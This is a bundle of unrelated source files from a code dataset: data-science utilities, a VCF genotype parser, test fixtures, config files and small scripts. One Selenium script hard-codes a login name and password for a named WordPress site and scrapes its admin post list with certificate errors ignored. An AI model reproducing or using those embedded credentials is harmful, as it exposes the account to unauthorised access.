self.df.select_dtypes(['number'])\r\n print(np.where(self.df.var()==0))\r\n self.df = self.df.drop(columns = self.df.columns[np.where(self.df.var()==0)]) #Entire dataset\r\n self.target_col = target_col\r\n\r\n self.y = self.df[self.target_col] #Target column for prediction\r\n self.X_raw = self.df.loc[:, self.df.columns != self.target_col] #Unscaled X values\r\n self.X = Normalizer().fit_transform(self.X_raw) #Normalize the X values\r\n self.Xdf = pd.DataFrame(self.X)\r\n self.Xdf.columns = self.X_raw.columns\r\n \r\n\r\n #Mutual Information (classification)\r\n def mutual_info_class(self):\r\n mi = mutual_info_classif(self.X, self.y)\r\n #mi = StandardScaler().fit_transform(mi.reshape(-1,1))\r\n mi_df = pd.DataFrame(mi)\r\n mi_df['Feature'] = self.X_raw.columns\r\n mi_df.columns = ['Score','Feature']\r\n mi_df = mi_df.sort_values(by = 'Score', ascending = False).loc[:,('Feature','Score')].reset_index(drop=True)\r\n return mi_df\r\n\r\n #Mutual Information (regression)\r\n def mutual_info_regress(self):\r\n mi = mutual_info_regression(self.X, self.y)\r\n #mi = StandardScaler().fit_transform(mi.reshape(-1,1))\r\n mi_df = pd.DataFrame(mi)\r\n mi_df['Feature'] = self.X_raw.columns\r\n mi_df.columns = ['Score','Feature']\r\n mi_df = mi_df.sort_values(by = 'Score', ascending = False).loc[:,('Feature','Score')].reset_index(drop=True)\r\n return mi_df\r\n\r\n def mrmr(self):\r\n # compute F-statistics and correlations\r\n F = pd.Series(f_regression(self.Xdf, self.y)[0], index = self.Xdf.columns)\r\n corr = self.Xdf.corr().abs().clip(.00001) # minimum value of correlation set to .00001 (to avoid division by zero)\r\n\r\n # initialize list of selected features and list of excluded features\r\n selected = []\r\n not_selected = list(self.Xdf.columns)\r\n\r\n # repeat K times: \r\n # compute FCQ score for all the features that are currently excluded,\r\n # then find the best one, add it to selected, and remove it from not_selected\r\n for i in range(len(self.Xdf.columns)):\r\n\r\n # compute FCQ score for all the (currently) excluded features (this is Formula 2)\r\n score = F.loc[not_selected] / corr.loc[not_selected, selected].mean(axis = 1).fillna(.00001)\r\n\r\n # find best feature, add it to selected and remove it from not_selected\r\n best = score.index[score.argmax()]\r\n selected.append(best)\r\n not_selected.remove(best)\r\n return selected\r\n\r\n","sub_path":"feature_select.py","file_name":"feature_select.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642353409","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\nimport os\r\n\r\n\r\ndef login():\r\n browser.get(\"https://houhuayuan.vip\")\r\n try:\r\n browser.find_element(By.ID, \"user_login\").send_keys(\"w1g2f3\")\r\n except Exception:\r\n print('输入用户名失败')\r\n else:\r\n print('输入用户名成功')\r\n try:\r\n browser.find_element(By.ID, \"user_pass\").send_keys(\"123456\")\r\n except Exception:\r\n print('输入密码失败')\r\n else:\r\n print('输入密码成功')\r\n browser.find_element(By.NAME, \"wp-submit\").click()\r\n\r\n\r\ndef main():\r\n login()\r\n url_base = \"https://houhuayuan.vip/wp-admin/edit.php?post_status=publish&post_type=post&paged=\"\r\n n = 2\r\n with open(\"D:\\\\PYcode\\\\wwww\\\\zhaoze_url.txt\",mode = 'a+',encoding='utf-8') as f:\r\n while(n < 114):\r\n url = url_base + str(n)\r\n browser.get(url)\r\n for i in range(1, 21):\r\n name_xpath = \"/html/body/div/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[\"+str(i)+\"]/td[1]/strong/span\"\r\n href_xpath = \"/html/body/div/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[\"+str(i)+\"]/td[1]/div/span/a\"\r\n name = browser.find_element(By.XPATH, name_xpath)\r\n href = browser.find_element(By.XPATH, href_xpath)\r\n f.write(name.get_attribute('innerText') + \":\")\r\n f.write(\"\\n\")\r\n f.write(href.get_attribute('href'))\r\n f.write(\"\\n\")\r\n n = n +1\r\n f.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('-ignore-certificate-errors')\r\n # options.add_argument('-ignore -ssl-errors')\r\n # options.add_argument('-disable-software-rasterizer')\r\n browser = webdriver.Chrome(options=options)\r\n main()\r\n browser.quit()\r\n","sub_path":"list_get.py","file_name":"list_get.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"599643223","text":"n = int(input(\"Enter the no. of terms to be printed\"))\nif n == 1:\n print(\"0\")\nelif n== 2:\n print(\"0, 1\")\nelse:\n print(\"0, 1\", end = \", \")\n a, b = 0, 1\n for i in range(n-2):\n c = a+b\n print(c,end=\", \")\n a=b\n b = c\n","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175912591","text":"#!/usr/bin/env python\n\n#Various functions to parse and filter genotype data from vcf files.\n#If run independently it will pipe \"genotypes\" format to stdout. \n\nimport argparse, sys, gzip, re, subprocess\n\nimport numpy as np\n\ndef GTtype(alleles):\n alleleSet = set(alleles)\n if len(alleleSet) > 1: return \"Het\"\n elif \"0\" in alleleSet: return \"HomRef\"\n elif \".\" in alleleSet: return \"Missing\"\n else: return \"HomAlt\"\n\n\nclass VcfSite:\n \n __slots__ = ['CHROM', 'POS', 'ID', 'REF', 'ALT', 'REF_ALT', 'QUAL', 'FILTER', 'INFO', 'sampleNames', 'genoData', \"alleleDict\"]\n \n def __init__(self, elements=None, line=None, headers=None, headerLine=None, precompGenoData=None):\n assert((elements != None or line != None) and (headers != None or headerLine != None))\n if not headers: headers = headerLine.split()\n if not elements: elements = line.split()\n \n lineDict = dict(zip(headers,elements))\n \n self.CHROM = lineDict[\"#CHROM\"]\n self.POS = int(lineDict[\"POS\"])\n self.ID = lineDict[\"ID\"]\n self.REF = lineDict[\"REF\"]\n self.ALT = lineDict[\"ALT\"].split(\",\")\n self.alleleDict = dict(zip([str(i) for i in range(len(self.ALT)+1)], [self.REF] + self.ALT))\n self.QUAL = lineDict[\"QUAL\"]\n self.FILTER = lineDict[\"FILTER\"]\n self.INFO = lineDict[\"INFO\"].split(\";\")\n \n genoInfoNames = lineDict[\"FORMAT\"].split(\":\")\n \n self.sampleNames = headers[9:]\n \n self.genoData = {}\n for sampleName in self.sampleNames:\n #if pre-compiled genotype data are available, try using those \n if precompGenoData and lineDict[sampleName] in precompGenoData:\n self.genoData[sampleName] = precompGenoData[lineDict[sampleName]]\n else:\n #otherwise make dictionary for this sample\n self.genoData[sampleName] = dict(zip(genoInfoNames, lineDict[sampleName].split(\":\")))\n if \"GT\" in self.genoData[sampleName]:\n self.genoData[sampleName][\"alleles\"] = tuple(self.genoData[sampleName][\"GT\"])[::2]\n self.genoData[sampleName][\"phase\"] = \"|\" if \"|\" in self.genoData[sampleName][\"GT\"] else \"/\"\n if precompGenoData[\"__counter__\"] < precompGenoData[\"__maxSize__\"]:\n precompGenoData[lineDict[sampleName]] = self.genoData[sampleName]\n precompGenoData[\"__counter__\"] += 1\n \n \n def getGenotype(self, sample, gtFilters = [], withPhase=True, asNumbers = False, missing = None, allowOnly=None, keepPartial=False, ploidy=None):\n genoData = self.genoData[sample]\n if missing is None:\n if asNumbers: missing = \".\"\n else: missing = \"N\"\n \n #check each gt filter\n passed = True\n for gtFilter in gtFilters:\n #first check that it's applicable\n if (\"siteTypes\" in gtFilter and self.getType() not in gtFilter[\"siteTypes\"]): continue\n if (\"gtTypes\" in gtFilter and GTtype(genoData[\"alleles\"]) not in gtFilter[\"gtTypes\"]): continue\n if (\"samples\" in gtFilter and sample not in gtFilter[\"samples\"]): continue\n #now check that it passes\n #might be a single value, nut could be several separated by commas. So will split in case\n try:\n values = np.array(genoData[gtFilter[\"flag\"]].split(\",\"), dtype=float)\n passed = np.all(gtFilter[\"min\"] <= values) and np.all(values <= gtFilter[\"max\"])\n except: passed = False\n #try: passed = gtFilter[\"min\"] <= float(genoData[gtFilter[\"flag\"]]) <= gtFilter[\"max\"]\n #except: passed = False\n if not passed: break\n \n if ploidy is None: ploidy=len(genoData[\"alleles\"])\n \n if passed:\n if not asNumbers:\n try:\n sampleAlleles = [self.alleleDict[a] for a in genoData[\"alleles\"]]\n if allowOnly: sampleAlleles = [a if a in allowOnly else missing for a in sampleAlleles]\n if not keepPartial: sampleAlleles = sampleAlleles if missing not in sampleAlleles else [missing]*ploidy\n \n except: sampleAlleles = [missing]*ploidy\n \n else:\n sampleAlleles = genoData[\"alleles\"][:]\n \n \n else: sampleAlleles = [missing]*ploidy\n \n if withPhase: return genoData[\"phase\"].join(sampleAlleles)\n else: return \"\".join(sampleAlleles)\n \n \n def getGenotypes(self, gtFilters = [], asList = False, withPhase=True, asNumbers = False,\n samples = None, missing = None, allowOnly=None, keepPartial=False, ploidyDict=None):\n \n if not samples: samples = self.sampleNames\n output = {}\n for sample in samples:\n ploidy = ploidyDict[sample] if ploidyDict is not None else None\n output[sample] = self.getGenotype(sample, gtFilters=gtFilters, withPhase=withPhase, asNumbers=asNumbers,\n missing=missing, allowOnly=allowOnly, keepPartial=keepPartial, ploidy=ploidy)\n \n if asList: return [output[sample] for sample in samples]\n \n return output\n \n def getType(self):\n if len(self.REF) == 1:\n if self.ALT == [\".\"]: return \"mono\"\n elif max([len(a) for a in self.ALT]) == 1: return \"SNP\"\n else: return \"indel\"\n else: return \"indel\"\n \n def getGenoField(self, field, samples = None, missing=None):\n if missing is None: missing = \".\"\n if samples is None: samples = self.sampleNames\n fields = []\n for sample in samples:\n try: fields.append(self.genoData[sample][field])\n except: fields.append(missing)\n return fields\n\n\ndef parseHeaderLines(fileObj):\n output = {}\n output[\"contigs\"] = []\n output[\"contigLengths\"] = {}\n for line in fileObj:\n if line.startswith(\"##contig\"):\n contigDataDict = dict([x.split(\"=\") for x in re.split('<|>', line)[1].split(\",\")])\n elements = re.split('=|,|>', line)\n output[\"contigs\"].append(contigDataDict[\"ID\"])\n try: output[\"contigLengths\"][contigDataDict[\"ID\"]] = int(contigDataDict[\"length\"])\n except: output[\"contigLengths\"][contigDataDict[\"ID\"]] = None\n \n if line.startswith(\"#CHROM\"):\n output[\"mainHead\"] = line\n elements = line.split()\n output[\"sampleNames\"] = line.split()[9:]\n output[\"nSamples\"] = len(output[\"sampleNames\"])\n output[\"mainHeaders\"] = elements\n break\n \n return output\n\n\ndef getHeadData(fileName):\n with gzip.open(fileName, \"rt\") if fileName.endswith(\".gz\") else open(fileName, \"rt\") as fileObj:\n return parseHeaderLines(fileObj)\n\n\ndef parseVcfSites(lines, mainHeaders, precomp=True, precompMaxSize=10000, excludeDuplicates=False):\n if precomp:\n precompGenoData = {}\n precompGenoData[\"__maxSize__\"] = precompMaxSize\n precompGenoData[\"__counter__\"] = 0\n else: precompGenoData = None\n \n if excludeDuplicates: lastChrom = lastPos = None\n \n for elements in lines:\n if isinstance(elements, str): elements = elements.split()\n if elements[0][0] == \"#\": continue\n if excludeDuplicates:\n if elements[0] == lastChrom and elements[1] == lastPos: continue\n lastChrom = elements[0]\n lastPos = elements[1]\n yield VcfSite(elements=elements, headers=mainHeaders, precompGenoData=precompGenoData)\n\ndef canFloat(string):\n try: float(string)\n except: return False\n return True\n\ndef parseGenotypeFilterArg(arg):\n try:\n gtfDict = dict([tuple(i.split(\"=\")) for i in arg])\n for key in gtfDict.keys():\n assert key in [\"flag\",\"min\",\"max\", \"siteTypes\", \"gtTypes\", \"samples\"]\n for key in [\"siteTypes\", \"gtTypes\", \"samples\"]:\n if key in gtfDict: gtfDict[key] = gtfDict[key].split(\",\")\n gtfDict[\"min\"] = float(gtfDict[\"min\"]) if \"min\" in gtfDict else -np.inf\n gtfDict[\"max\"] = float(gtfDict[\"max\"]) if \"max\" in gtfDict else np.inf\n return gtfDict\n except: raise ValueError(\"Bad genotype filter specification. See help.\")\n\n###############################################################################################################\nif __name__ == \"__main__\":\n\n\n ### parse arguments\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--inFile\", help=\"Input vcf file\", action = \"store\")\n parser.add_argument(\"-o\", \"--outFile\", help=\"Output csv file\", action = \"store\")\n\n #specific samples\n parser.add_argument(\"-s\", \"--samples\", help=\"sample names (separated by commas)\", action='store')\n\n #contigs\n parser.add_argument(\"--include\", help=\"include contigs (separated by commas)\", action='store')\n parser.add_argument(\"--includeFile\", help=\"File of contigs (one per line)\", action='store')\n parser.add_argument(\"--exclude\", help=\"exclude contigs (separated by commas)\", action='store')\n parser.add_argument(\"--excludeFile\", help=\"File of contigs (one per line)\", action='store')\n\n\n #vcf parsing arguments\n parser.add_argument(\"--minQual\", help=\"Minimum QUAL for a site\", type=int, action = \"store\")\n parser.add_argument(\"--gtf\", help=\"Genotype filter. Syntax: flag=X min=X max=X siteTypes=X,X.. gtTypes=X,X.. samples=X,X..\", action = \"append\", nargs = '+')\n\n parser.add_argument(\"--skipIndels\", help=\"Skip indels\", action = \"store_true\")\n parser.add_argument(\"--skipMono\", help=\"Skip monomorphic sites\", action = \"store_true\")\n \n parser.add_argument(\"--ploidy\", help=\"Ploidy for each sample\", action = \"store\", type=int, nargs=\"+\", default=[2])\n parser.add_argument(\"--ploidyFile\", help=\"File with samples names and ploidy as columns\", action = \"store\")\n \n parser.add_argument(\"--field\", help=\"Optional - format field to extract\", action = \"store\")\n parser.add_argument(\"--missing\", help=\"Value to use for missing data\", action = \"store\")\n parser.add_argument(\"--outSep\", help=\"Output separator\", action = \"store\", default = \"\\t\")\n\n args = parser.parse_args()\n\n samples = args.samples\n\n if samples: samples = samples.split(\",\")\n\n include = []\n exclude = []\n\n if args.include: include += args.include.split(\",\")\n if args.exclude: exclude += args.exclude.split(\",\")\n\n if args.includeFile:\n with open(args.includeFile, 'r') as includeFile:\n include += [c.strip() for c in includeFile.read().split(\"\\n\")]\n\n if args.excludeFile:\n with open(args.excludeFile, 'r') as excludeFile:\n exclude += [c.strip() for c in excludeFile.read().split(\"\\n\")]\n\n if len(include) >= 1:\n include = set(include)\n sys.stderr.write(\"{} contigs will be included.\".format(len(include)))\n \n if len(exclude) >= 1:\n exclude = set(exclude)\n sys.stderr.write(\"{} contigs will be excluded.\".format(len(exclude)))\n \n gtFilters = [parseGenotypeFilterArg(gtf) for gtf in args.gtf] if args.gtf else []\n \n ##########################################################################################################################\n\n ### open files\n\n if args.inFile: inFile = gzip.open(args.inFile, \"rt\") if args.inFile.endswith(\".gz\") else open(args.inFile, \"rt\")\n else: inFile = sys.stdin\n\n\n if args.outFile: outFile = gzip.open(args.outFile, \"w\") if args.outFile.endswith(\".gz\") else open(args.outFile, \"w\")\n else: outFile = sys.stdout\n \n #header data\n headData = parseHeaderLines(inFile)\n \n #check specified samples are in first file. Otherwise use this entire set \n if samples:\n for sample in samples: assert sample in headData[\"sampleNames\"], \"Specified sample name not in VCF header.\"\n else: samples = headData[\"sampleNames\"]\n \n if args.ploidyFile is not None:\n with open(args.ploidyFile, \"rt\") as pf: ploidyDict = dict([[s[0],int(s[1])] for s in [l.split() for l in pf]])\n else:\n ploidy = args.ploidy if len(args.ploidy) != 1 else args.ploidy*len(samples)\n assert len(ploidy) == len(samples), \"Incorrect number of ploidy values supplied.\"\n ploidyDict = dict(zip(samples,ploidy))\n\n\n ##########################################################################################################################\n\n outFile.write(args.outSep.join([\"#CHROM\", \"POS\"] + samples) + \"\\n\")\n \n for vcfSite in parseVcfSites(inFile, headData[\"mainHeaders\"]):\n if (exclude and vcfSite.CHROM in exclude) or (include and vcfSite.CHROM not in include): continue\n if args.skipMono and vcfSite.getType() is \"mono\": continue\n if args.minQual and canFloat(vcfSite.QUAL) and float(vcfSite.QUAL) < args.minQual: continue\n if args.field is not None: output = vcfSite.getGenoField(args.field,samples=samples, missing=args.missing)\n else:\n allowed=[\"A\",\"C\",\"G\",\"T\"] if args.skipIndels else None\n output = vcfSite.getGenotypes(gtFilters,asList=True,withPhase=True,samples=samples,missing=args.missing,\n allowOnly=allowed,keepPartial=False,ploidyDict=ploidyDict)\n outFile.write(args.outSep.join([vcfSite.CHROM, str(vcfSite.POS)] + output) + \"\\n\")\n \n outFile.close()\n","sub_path":"07.fd/parseVCF.py","file_name":"parseVCF.py","file_ext":"py","file_size_in_byte":13434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37394777","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport atexit\nimport os\nimport threading\n\n\nclass BaseWorker:\n NAME = None\n\n def __init__(self):\n assert self.NAME, \"Worker class `{}` must have a valid name.\".format(\n self.__class__.__name__\n )\n self._lock = threading.Lock()\n self._thread = None\n self._thread_for_pid = None\n\n def is_alive(self):\n if self._thread_for_pid != os.getpid():\n return False\n return bool(self._thread and self._thread.is_alive())\n\n def is_running(self):\n if self.is_alive():\n return\n self.start()\n\n def start(self):\n self._lock.acquire()\n try:\n if not self.is_alive():\n self._thread = threading.Thread(target=self._target, name=self.NAME)\n self._thread.setDaemon(True)\n self._thread.start()\n self._thread_for_pid = os.getpid()\n finally:\n self._lock.release()\n atexit.register(self.atexit)\n\n def atexit(self):\n raise NotImplementedError(\"Worker must implement `atexit` function.\")\n\n def _target(self):\n raise NotImplementedError(\"Worker must implement `target` function.\")\n","sub_path":"core/polyaxon/client/workers/base_worker.py","file_name":"base_worker.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"138259169","text":"import pytest\nimport allure\nfrom selenium import webdriver\nimport datetime\nimport pip\nimport platform\nimport xdist\nimport selenium\nimport os\n\n\ndef pytest_addoption(parser):\n parser.addoption('--browser', action='store', default='chrome', help='Available: chrome, firefox, opera')\n parser.addoption('--executor', action='store', default='local', help='Choose execute: local, selenoid')\n parser.addoption('--vnc', action='store', default='disable', help='enableVNC: enable, disable')\n parser.addoption('--video', action='store', default='disable', help='Saving Video: enable, disable')\n\n\n@pytest.hookimpl(hookwrapper=True, tryfirst=True)\ndef pytest_runtest_makereport(item, call):\n outcome = yield\n rep = outcome.get_result()\n setattr(item, \"rep_\" + rep.when, rep)\n return rep\n\n\n@pytest.fixture(scope='function')\ndef browser(request):\n with allure.step('Запускаем браузер'):\n if request.config.getoption('--executor') == 'selenoid':\n\n capabilities = {\n \"browserName\": request.config.getoption('--browser'),\n \"enableVNC\": False if request.config.getoption('--vnc') == 'disable' else True,\n \"enableVideo\": False if request.config.getoption('--video') == 'disable' else True,\n \"env\": [\"TZ=Europe/Moscow\"]\n }\n\n browser = webdriver.Remote(command_executor=\"http://localhost:4444/wd/hub\",\n desired_capabilities=capabilities)\n\n elif request.config.getoption('--executor') == 'local':\n if request.config.getoption('--browser') == 'chrome':\n browser = webdriver.Chrome()\n\n elif request.config.getoption('--browser') == 'firefox':\n browser = webdriver.Firefox()\n\n elif request.config.getoption('--browser') == 'opera':\n browser = webdriver.Opera()\n browser.set_window_position(0, 0)\n browser.set_window_size(1920, 1080)\n browser.implicitly_wait(10)\n yield browser\n\n if request.config.getoption('--alluredir') == 'allure_results':\n env_file = open('./allure_results/environment.properties', 'w+')\n env_file.write(f'OS.version={platform.platform()}'\n f'\\nPython.version={platform.python_version()}'\n f'\\nPytest.version={pytest.__version__}'\n f'\\nSelenium.version={selenium.__version__}'\n f'\\nPip.version={pip.__version__}'\n f'\\nXdist.version={xdist.__version__}'\n f'\\nExecutor.type={request.config.getoption(\"--executor\")}'\n f'\\nBrowser={request.config.getoption(\"--browser\")}')\n env_file.close()\n\n if request.node.rep_call.failed:\n try:\n browser.execute_script(\"document.body.bgColor = 'white';\")\n date = str(datetime.datetime.now().strftime(\"%d-%m-%Y_%H%M%S\"))\n browser.save_screenshot(f'./screenshots/{date}_{request.function.__name__}.png')\n allure.attach(browser.get_screenshot_as_png(),\n name=request.function.__name__,\n attachment_type=allure.attachment_type.PNG)\n finally:\n pass\n\n with allure.step('Закрываем браузер'):\n browser.quit()\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"162640032","text":"import click\n\nfrom game import play, simulate\nfrom players import ConsolePlayer, MiniMaxPlayer, NNPlayer, ReinforcementPlayer, RandomPlayer, MiniMaxPlayerNN, \\\n MiniMaxPlayerNN2\nfrom tictactoe_state import TicTacToeState\n\n\n@click.command('connect4')\n@click.option('--simulations', '-s',\n default=5000,\n help='How many plays to simulate for training.')\n@click.option('--mode', '-m',\n default='reinforcement',\n type=click.Choice(['console', 'window', 'simulation', 'reinforcement']),\n help='Starts game in a terminal or a window.')\n@click.option('--ai-player', '-p',\n default='cnn2',\n type=click.Choice(['nn', 'minimax', 'cnn', 'cnn2']),\n help='Type of ai player')\n@click.option('--epochs', '-e',\n default=3,\n help='Number of epochs to train. (only for ai-player=nn)')\n@click.option('--lookahead', '-l',\n default=1,\n help='Lookahead depth for the minimax algorithm.'\n ' (only for ai-player=minimax)')\ndef tictactoe(simulations, mode, ai_player, epochs, lookahead):\n state = TicTacToeState()\n\n if ai_player == 'nn':\n from tictactoe_model import TicTacToeModel\n model = TicTacToeModel()\n plays = simulate(state, simulations)\n model.train(plays, epochs=epochs)\n autoplayer = NNPlayer(model, 'DNN')\n elif ai_player == 'cnn':\n from tictactoe_model_cnn import TicTacToeModelCnn\n model = TicTacToeModelCnn()\n plays = simulate(state, simulations)\n model.train(plays, epochs=epochs)\n autoplayer = NNPlayer(model, 'CNN')\n elif ai_player == 'cnn2':\n from tictactoe_model_cnn2 import TicTacToeModelCnn2\n model = TicTacToeModelCnn2()\n plays = simulate(state, simulations, player1=RandomPlayer(), player2=RandomPlayer())\n model.train(plays, epochs=epochs)\n autoplayer = ReinforcementPlayer(model, 'CNN2')\n else:\n autoplayer = MiniMaxPlayer(lookahead=lookahead)\n\n if mode == 'console':\n states, _ = play(state, ConsolePlayer(), autoplayer)\n print(states[-1].state)\n elif mode == 'simulation':\n player1 = autoplayer\n\n # from tictactoe_model_cnn import TicTacToeModelCnn\n # cnn_model = TicTacToeModelCnn()\n # cnn_plays = simulate(state, simulations)\n # cnn_model.train(cnn_plays, epochs=epochs)\n # player2 = NNPlayer(cnn_model, 'CNN')\n player2 = RandomPlayer()\n\n plays = simulate(state, 50, player1=player1, player2=player2)\n player1_wins, player2_wins, draws = game_statistics(plays)\n\n plays = simulate(state, 50, player1=player2, player2=player1)\n p2, p1, d = game_statistics(plays)\n player1_wins += p1\n player2_wins += p2\n draws += d\n\n print(f'{player1} vs. {player2}')\n print(f'{player1} wins: {player1_wins}')\n print(f'{player2} wins: {player2_wins}')\n print(f'Draws: {draws}')\n elif mode == 'reinforcement':\n # initial training with random plays (not really necessary)\n from tictactoe_model import TicTacToeModel\n model = TicTacToeModel()\n plays = simulate(state, simulations, player1=RandomPlayer(), player2=RandomPlayer())\n model.train(plays, epochs=epochs)\n nnplayer = NNPlayer(model, 'DNN')\n autoplayer = MiniMaxPlayer(1)\n\n player1 = autoplayer\n # player2 = RandomPlayer()\n\n for _ in range(10):\n # training through self-play\n # plays = simulate(state, 100, player1=player1, player2=player1)\n # print_game(plays[0])\n # print_game(plays[1])\n # model.train(plays, epochs=epochs)\n\n # benchmark vs random\n duel_random_tictactoe(player1)\n\n else:\n from tictactoe_window import TicTacToeWindow\n state = TicTacToeState()\n state = state.move(autoplayer.next_action(state))\n TicTacToeWindow(autoplayer=autoplayer, state=state).show()\n\n\ndef duel_random_tictactoe(player1):\n player2 = MiniMaxPlayer(2)\n state = TicTacToeState()\n duel(player1, player2, state)\n\n\ndef duel(player1, player2, state):\n plays = simulate(state, 50, player1=player1, player2=player2)\n print_game(plays[0])\n\n player1_wins, player2_wins, draws = game_statistics(plays)\n plays = simulate(state, 50, player1=player2, player2=player1)\n print_game(plays[0])\n\n p2, p1, d = game_statistics(plays)\n player1_wins += p1\n player2_wins += p2\n draws += d\n print(f'{player1} vs. {player2}')\n print(f'{player1} wins: {player1_wins}')\n print(f'{player2} wins: {player2_wins}')\n print(f'Draws: {draws}')\n\n\ndef game_statistics(plays):\n player1_wins = [p[1] for p in plays].count(1)\n player2_wins = [p[1] for p in plays].count(-1)\n draws = [p[1] for p in plays].count(0)\n\n return player1_wins, player2_wins, draws\n\n\ndef print_game(play):\n for state in play[0]:\n print(state, end=', ')\n print()\n\n\nif __name__ == '__main__':\n tictactoe()\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91596412","text":"\"\"\"\nThis is a test example of configuration file for CRAB-3 client\n\"\"\"\n\nfrom WMCore.Configuration import Configuration\n\nconfig = Configuration()\n\n## General options for the client\nconfig.section_(\"General\")\nconfig.General.standalone = True\n\n#\n# To enable direct submission, uncomment the below and turn\n# config.General.enableGsissh to false.\n#\n# config.General.condorPool = \"glidein.unl.edu\"\n# config.General.condorScheddList = [\"glidein.unl.edu\"]\n#\n\nconfig.General.enableGsissh = True\nconfig.section_(\"BossAir\")\nconfig.BossAir.remoteUserHost = \"submit-5.t2.ucsd.edu\"\n\nconfig.General.requestName = 'bbockelm_crab3_2'\nconfig.General.serverUrl = 'cmsweb.cern.ch'\n\n## Specific option of the job type\nconfig.section_(\"JobType\")\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'pset.py'\n\n## Specific data options\nconfig.section_(\"Data\")\nconfig.Data.inputDataset = '/GenericTTbar/HC-CMSSW_5_3_1_START53_V5-v1/GEN-SIM-RECO'\nconfig.Data.publishDataName = 'crab_bbockelm_3'\nconfig.Data.unitsPerJob = 50\n\n## User options\nconfig.section_(\"User\")\nconfig.User.email = ''\n\nconfig.section_(\"Site\")\nconfig.Site.storageSite = 'T2_US_Nebraska'\n","sub_path":"example/crabConfig.py","file_name":"crabConfig.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"420657260","text":"import os\nimport sys\nfrom PyQt5 import QtWidgets\n\ndef load_ressources():\n if os.path.isfile(r\"ressources/ressources.qrc\"):\n os.system(r\"pyrcc5 ressources/ressources.qrc -o ressources/ressources.py\")\n\n\nif __name__ == \"__main__\":\n APP = 0\n if QtWidgets.QApplication.instance():\n APP = QtWidgets.QApplication.instance()\n else:\n APP = QtWidgets.QApplication(sys.argv)\n APP.setStyle('fusion')\n if True:\n load_ressources()\n if True:\n from src.gui import GUI\n window = GUI()\n window.show()\n\n #if APP:\n # sys.exit(APP.quit())\n sys.exit(APP.exec_())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169460612","text":"# -*- coding:utf-8 -*-\r\n\r\n# 图片二值化\r\nfrom PIL import Image\r\n\r\nimg = Image.open('test2.jpg')\r\n\r\n# 模式L”为灰色图像,它的每个像素用8个bit表示,0表示黑,255表示白,其他数字表示不同的灰度。\r\nImg = img.convert('L')\r\nImg.save(\"testA.jpg\")\r\n\r\n# 自定义灰度界限,大于这个值为黑色,小于这个值为白色\r\nthreshold = 180\r\n\r\ntable = []\r\nfor i in range(256):\r\n if i < threshold:\r\n table.append(0)\r\n else:\r\n table.append(1)\r\n\r\n# 图片二值化\r\nphoto = Img.point(table, '1')\r\nphoto.save(\"testB.jpg\")\r\n","sub_path":"BlankW.py","file_name":"BlankW.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"527300433","text":"from xlrd import open_workbook\n\nclass Company(object):\n def __init__(self, id, comp_name, comp_industry, comp_year, address, address2, phone):\n self.id = id\n self.comp_name = comp_name\n self.comp_industry = comp_industry\n self.comp_year = comp_year\n self.address = address\n self.address2 = address2\n self.phone = phone\n\n def __str__(self):\n return(\"Company object:\\n\"\n \" No. = {0}\\n\"\n \" 병역지정업체명 = {1}\\n\"\n \" 업종구분 = {2}\\n\"\n \" 기업규모 = {3}\\n\"\n \" 선정년도 = {4} \\n\"\n \" 소재지 = {5}\"\n \" 세부주소 = {6}\"\n \" 전화번호 = {7}\"\n .format(self.id, self.comp_name, self.comp_industry,\n self.comp_year, self.address, self.address2, self.phone))\n\nwb = open_workbook('C:\\\\Users\\\\Joon\\\\Documents\\\\GitHub\\\\sortsort\\\\sort.xlsx')\nfor sheet in wb.sheets():\n number_of_rows = sheet.nrows\n number_of_columns = sheet.ncols\n\n items = []\n\n rows = []\n for row in range(0, number_of_rows):\n values = []\n for col in range(number_of_columns):\n value = (sheet.cell(row,col).value)\n try:\n value = str(int(value))\n except ValueError:\n pass\n finally:\n values.append(value)\n item = Company(*values)\n items.append(item)\n\n\n\ndef searchbyAddress():\n a = input(\"주소: \")\n for item in items:\n dodo = item.address\n dodo1 = dodo.split()\n if dodo1[2] == a:\n print (item.comp_name + \" \" + item.address)\n #print (item.comp_name)\n #print (\"{0} {1} 